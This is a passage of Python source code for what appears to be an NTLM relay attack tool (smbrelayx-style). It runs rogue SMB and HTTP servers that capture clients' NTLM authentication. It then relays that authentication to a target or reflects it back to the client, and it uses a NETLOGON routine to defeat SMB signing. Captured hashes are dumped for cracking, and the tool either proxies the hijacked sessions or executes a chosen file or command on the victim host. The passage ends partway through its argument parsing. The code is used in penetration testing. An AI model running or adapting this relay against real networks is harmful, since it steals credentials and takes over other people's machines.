if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = str(authenticateMessageBlob)
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = str(negotiateMessage)
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self)
except:
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message)
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
return self.do_GET()
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception, e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = str(token)
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\%s FAILED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if smbData.has_key(self.target):
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception, e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if smbData.has_key(self.target) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\%s FAILED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies return status after successful relayed authentication to return
# to the connecting client. This comes useful when we don't want the connecting
# client to store successful credentials in his memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make him store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin,
# and got configured Remote UAC, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
